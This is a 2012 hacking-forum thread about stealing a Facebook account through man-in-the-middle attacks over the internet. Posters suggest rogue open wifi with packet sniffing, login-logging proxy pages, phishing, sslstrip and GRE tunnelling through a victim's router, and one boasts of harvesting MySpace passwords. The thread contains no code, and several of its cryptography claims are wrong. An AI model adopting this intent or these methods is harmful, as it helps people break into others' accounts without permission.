EvilZone
Hacking and Security => Hacking and Security => : fr0wnR July 10, 2012, 01:04:53 AM
-
is it possible to use something like a mitm attack not only on the local network, but also over the internet? a friend thinks he could hack a facebook account with a mitm attack, but without being in the same network.. :o so is this possible?
-
Well there are a lot of ways, you just have to somehow get the victim to go through you before connecting to fb. My personal fav is creating an.unsecured wifi network in a public place, then using wireshark to grab anything and everything that comes through.
And from my understanding mitm doesn't typically happen on a local network, but rather over unsecured or cracked wifi... but I could be mistaken about that as my experience with it is limited
Also I imagine sending someone a link that connects them to some sort of proxy/website you control that then sends them to fb automatically after might work as well...never tried it though
-
The proxy idea is the only way I can think of over the open internet. But the data would still be encrypted?
A much easier way would be a social engineering, or phishing.
-
Thanks guys, will tell him!
-
asdf
-
Not true, all you need is a web host with a special proxy script that logs all logins. I spread a few of these back in high school, SOO many myspace passwords. Most people wont be tricked with social engineering. Phishing is getting harder and harder, however it probably works the best minus a keylogger or the proxy logger
Phishing end-users always works, they have no idea even what a url is.
-
I thought Wireshark could not sniff however encrypted passwords such as https or ssl. Though I hear ettercap can indeed sniff ssl/https: passwords by just changing a rem in the conf file.
-
I thought Wireshark could not sniff however encrypted passwords such as https or ssl. Though I hear ettercap can indeed sniff ssl/https: passwords by just changing a rem in the conf file.
I am pretty sure it cannot, that would defeat the whole purpose of SSL. SSL (iirc) is based on symmetric encryption which have one private and one public key for each session/connection and only one of them can be used to encrypt and decrypt the other. Hence why it is not possible to sniff SSL because you dont know the required key. You could brute force it but that would take millenniums.
-
True. But how many people, present company excluded, connect to fb through an ssl connection? Default is not SSL so most people don't do it
-
What about sslstrip? I didnĀ“t try it, but I think it can sniff out passwords with ssl encryption..?
-
The idea with SSLStrip is that it "strips" the encryption of the captured packet and displays decrypted data.
-
asdf
-
I am pretty sure it cannot, that would defeat the whole purpose of SSL. SSL (iirc) is based on symmetric encryption which have one private and one public key for each session/connection and only one of them can be used to encrypt and decrypt the other. Hence why it is not possible to sniff SSL because you dont know the required key. You could brute force it but that would take millenniums.
That would be indeed true about SSL. I will definetly take a look into the HTTPS: portion however. I was just going off of what I have read around the interwebs about Ettercap. (Haven't had a chance to put it into practice.) However, if a program like ssl strip could do it I can't see why that wouldn't be a "feature" of ettercap if you start messing with the conf file. I dont think if you go to your local wifi hotspot start sniffing the network you will get plain text but it may or may not give you the encrypted data.
-
SSL stripping will only work if.
1. The client is a dumbass and doesn't notice the s part in https is gone as well as all those lovely "SECURE!" logos and texts.
2. The page you are stripping supports normal HTTP or you proxy the client trough yourself posing as a HTTP server serving the HTTP version of the page.
3. There is no javascript redirection if non-ssl (you could probably just filter this out if you already have a proxy up tho).
It is actually kind of funny. HTTP with SSL is broken and insecure because regular HTTP is still in existance; If there was no other way of serving the desired data, both the communication and certification would have to be legit!
That would be indeed true about SSL. I will definetly take a look into the HTTPS: portion however. I was just going off of what I have read around the interwebs about Ettercap. (Haven't had a chance to put it into practice.) However, if a program like ssl strip could do it I can't see why that wouldn't be a "feature" of ettercap if you start messing with the conf file. I dont think if you go to your local wifi hotspot start sniffing the network you will get plain text but it may or may not give you the encrypted data.
I highly doubt there is a "remove/decrypt SSL" feature in Ettercap (I dont use it and I am to busy to read up on it right now). This is because; SSL works with symmetric encryption for both communication and certificate verification. Only the real certificate owners would be able to sign the certificate with their private key.
However, HTTPS relies on third parties to verify their certificates. So you could possibly pose as the certificate verifier and just render everything OK.
I am by no means an expert on the field so I cant say for sure, but its my two cents for now.
-
is it possible to use something like a mitm attack not only on the local network, but also over the internet? a friend thinks he could hack a facebook account with a mitm attack, but without being in the same network.. :o so is this possible?
Yes,this is possible and its called GRE SNIFFING, you use router to start a tunnel and route all of the network traffic from that tunnel interface
-
Yes,this is possible and its called GRE SNIFFING, you use router to start a tunnel and route all of the network traffic from that tunnel interface
Looks interesting, tho as far as I could tell you need physical (or remote with login) access to the victims router.. Which makes things a lot harder.
-
Looks interesting, tho as far as I could tell you need physical (or remote with login) access to the victims router.. Which makes things a lot harder.
Yeah, if it was local, this wouldn't really be a problem. Most end users don't know how to log into their AP, and if they did, they hardly ever change the default password.
-
asdf